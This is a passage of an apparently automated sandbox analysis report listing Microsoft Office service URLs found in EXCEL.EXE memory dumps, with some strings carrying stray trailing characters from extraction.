Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://officesetup.getmicrosoftkey.comE
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/6
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesK
Source: EXCEL.EXE, 00000000.00000003.253271575.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesOfficeAddInClassifierOfficeEntitiesUpdated
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://onedrive.live.com
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false_J
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: EXCEL.EXE, 00000000.00000003.458245826.000000000FCB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.426971409.000000000FCB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253524497.000000000FCB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436961437.000000000FCB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453590375.000000000FCB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.293240983.000000000FCB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450030728.000000000FCB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451632929.000000000FCB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455517125.000000000FCB7000.00000004.00000001.sdmp	String found in binary or memory: https://onedrive.live.com/embed?idNam
Source: EXCEL.EXE, 00000000.00000002.584859078.000000000DDEE000.00000004.00000001.sdmp	String found in binary or memory: https://onedrive.live.comOneDriveLogUploadServicehttps://storage.live.com/clientlogs/uploadlocationM
Source: EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://osi.office.net
Source: EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp	String found in binary or memory: https://osi.office.netst
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://otelrules.azureedge.net
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://outlook.office.com
Source: EXCEL.EXE, 00000000.00000003.449854061.000000000FC27000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.426807499.000000000FC27000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253942258.000000001313E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436557728.000000000FC27000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.586689452.000000000FC27000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458047571.000000000FC27000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253149330.0000000013141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253364496.000000000FC27000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://outlook.office.com/
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp	String found in binary or memory: https://outlook.office365.c
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://outlook.office365.com
Source: EXCEL.EXE, 00000000.00000003.449854061.000000000FC27000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.426807499.000000000FC27000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253942258.000000001313E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436557728.000000000FC27000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.586689452.000000000FC27000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458047571.000000000FC27000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253149330.0000000013141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253364496.000000000FC27000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/ActivitiesMBI_SSL
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activitiesi
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonSubstrateOfficeIntelligenceServicehttps:
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsone
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/k
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: EXCEL.EXE, 00000000.00000003.253072813.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=OutlookMBI_SSL_SHORT
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://pages.store.office.com/review/query
Source: EXCEL.EXE, 00000000.00000003.253072813.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://pages.store.office.com/review/queryTemplateStarthttps://
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: EXCEL.EXE, 00000000.00000003.253072813.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspxAwsCgQueryhttps://
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonMBI_SSLpeople.directory.
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: 